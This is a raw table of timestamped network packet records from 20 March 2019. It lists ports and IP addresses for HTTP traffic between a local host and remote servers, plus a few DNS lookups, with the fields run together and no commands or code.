                    Mr 20, 2019 16:37:49.954895020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954909086 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.954924107 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954946995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954969883 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.954992056 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955013990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955035925 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955046892 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955066919 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955090046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955121040 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955128908 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955143929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955164909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955187082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955188990 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955209017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955231905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955254078 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955276966 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955291033 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955305099 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955315113 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955337048 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955358982 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955382109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955404043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955421925 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955426931 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955449104 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955471039 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.955511093 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.955558062 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.959779978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959826946 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959850073 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959872961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.959891081 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.959894896 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.960378885 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.984309912 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984383106 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984427929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984471083 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984518051 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984540939 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984602928 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984643936 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984667063 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984688997 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984725952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984750032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984806061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984839916 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984879017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984900951 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984920979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.984960079 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985001087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985055923 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985095978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985125065 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985152006 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985172987 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985213995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985270977 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985300064 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985321999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985358000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985379934 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985399961 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985440016 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985498905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985532999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985553980 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985614061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985649109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985670090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985701084 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985758066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985790014 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985810995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985851049 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985882998 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985923052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985956907 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.985977888 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986035109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986069918 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986109972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986139059 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986181974 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986203909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986239910 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986259937 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986299992 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986320972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986341000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986380100 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986419916 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986459970 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986491919 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986530066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986571074 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986599922 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986639023 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986680031 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986721992 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986752987 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986792088 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986824036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986845970 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986881018 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986902952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986922979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986951113 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.986973047 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987011909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987045050 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987066031 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987087011 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987107038 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987127066 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987148046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987169027 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987189054 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987209082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987229109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987248898 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987267971 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987288952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987308979 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987330914 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987350941 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987371922 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987391949 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987427950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987451077 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987478018 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987498999 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987520933 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987564087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987586021 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987643003 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987669945 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987692118 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987714052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987734079 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987755060 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987776041 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987797022 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987838030 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987879038 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987900019 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987921000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987966061 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.987987995 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988009930 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988055944 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988079071 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988147020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988183975 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988208055 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988229990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988272905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988296032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988322973 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988343000 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988373041 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988403082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988466024 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988487959 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988511086 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988533020 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988574982 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988615990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988636971 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988682985 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988740921 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988789082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988810062 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988831043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988853931 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988874912 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988897085 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988955975 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.988977909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989016056 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989037991 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989092112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989114046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989151955 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989172935 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989218950 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989252090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989273071 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989310026 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989350080 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989388943 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989424944 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989464045 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989497900 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989517927 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989557981 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989593029 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989614964 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989634991 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989655972 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989659071 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.989676952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.989810944 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990050077 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990155935 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990561962 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990617037 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.990792036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990823030 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990844965 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990870953 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990883112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990905046 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990935087 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990943909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990966082 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990987062 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.990986109 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991008043 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991029978 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991050959 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991071939 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991092920 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991117954 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991138935 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991149902 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991158009 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991179943 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991200924 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991220951 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991241932 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991262913 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991287947 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991307974 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991319895 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991328955 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991350889 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991370916 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991391897 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991413116 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991432905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991457939 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991461039 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991478920 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991498947 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991519928 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991540909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991561890 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991583109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991604090 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991627932 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991647959 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991667986 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991667986 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991689920 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991709948 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991729975 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991750956 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991771936 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991799116 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991818905 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991832972 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.991838932 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991859913 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991879940 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991900921 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991921902 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991941929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991962910 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.991986990 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992000103 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.992007017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992027998 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992048025 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992068052 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992089033 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992120028 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992158890 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992180109 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992199898 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992204905 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.992219925 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992240906 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992261887 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992281914 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992302895 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992326021 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.992327929 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992348909 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992372036 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992393017 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992422104 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992439032 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.992441893 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992463112 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992482901 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992502928 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992522955 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992542982 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992563963 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:49.992881060 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:49.999073982 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.103008032 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.103246927 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.135538101 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.135588884 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.135745049 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.135797977 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.168045998 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.168082952 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.168113947 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.168138981 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:50.168302059 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.168354988 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.168379068 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:50.168410063 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:37:54.958424091 MEZ804920431.148.219.163192.168.1.83
                    Mr 20, 2019 16:37:54.958623886 MEZ4920480192.168.1.8331.148.219.163
                    Mr 20, 2019 16:38:55.261363983 MEZ5111453192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:55.741086960 MEZ53511148.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:55.762423038 MEZ5568453192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:56.211323023 MEZ53556848.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:56.213529110 MEZ4920580192.168.1.83178.169.196.83
                    Mr 20, 2019 16:38:56.259866953 MEZ8049205178.169.196.83192.168.1.83
                    Mr 20, 2019 16:38:56.260273933 MEZ4920580192.168.1.83178.169.196.83
                    Mr 20, 2019 16:38:56.260993958 MEZ4920580192.168.1.83178.169.196.83
                    Mr 20, 2019 16:38:56.423000097 MEZ8049205178.169.196.83192.168.1.83
                    Mr 20, 2019 16:38:56.423110962 MEZ8049205178.169.196.83192.168.1.83
                    Mr 20, 2019 16:38:56.423137903 MEZ8049205178.169.196.83192.168.1.83
                    Mr 20, 2019 16:38:56.423352003 MEZ4920580192.168.1.83178.169.196.83
                    Mr 20, 2019 16:38:56.424479961 MEZ4920580192.168.1.83178.169.196.83
                    Mr 20, 2019 16:38:56.470892906 MEZ8049205178.169.196.83192.168.1.83
                    Mr 20, 2019 16:38:58.853560925 MEZ6182553192.168.1.838.8.8.8
                    Mr 20, 2019 16:38:58.865964890 MEZ53618258.8.8.8192.168.1.83
                    Mr 20, 2019 16:38:58.869601965 MEZ6182653192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.885890007 MEZ5361826208.67.222.222192.168.1.83
                    Mr 20, 2019 16:38:58.888394117 MEZ6182753192.168.1.83208.67.222.222
                    Mr 20, 2019 16:38:58.904824972 MEZ5361827208.67.222.222192.168.1.83
